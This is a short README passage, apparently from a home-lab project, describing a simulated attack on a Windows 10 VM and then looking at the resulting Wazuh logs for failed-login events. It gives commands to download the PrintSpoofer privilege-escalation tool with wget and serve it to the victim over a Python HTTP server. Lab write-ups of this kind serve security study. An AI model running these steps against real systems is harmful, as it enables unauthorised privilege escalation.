andresMen1274/Attack-Simulation---Opnsense/README.md

 <img width="630" height="346" alt="image" src="https://github.com/user-attachments/assets/e3cc7501-3cdd-4fc3-9760-602afe55a4ef" />

+After the login credentials have been compromised run the command wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -O printspoofer.exe on the Kali Linux machine to create a script for privlage escalation.
+After it has been downloaded on the kali linux machine start a http server with Python using the command python3 -m http.server 8000.
+On the Windows 10 VM enter http://10.200.30.10:8000 and download the printSpoofer.exe file.

 This confirms success and that the user system has now been comprimised.
 Now I will like to look at the logs generated as a result of this.
 Login to the Wazuh dashboard and enter the credintals.
 Select Modiules -> security Events and enter the number 4625(this number correlates to failed login attempts).

 <img width="1047" height="535" alt="image" src="https://github.com/user-attachments/assets/918492ba-a63c-42ea-8af2-c8db87b0f1e4" />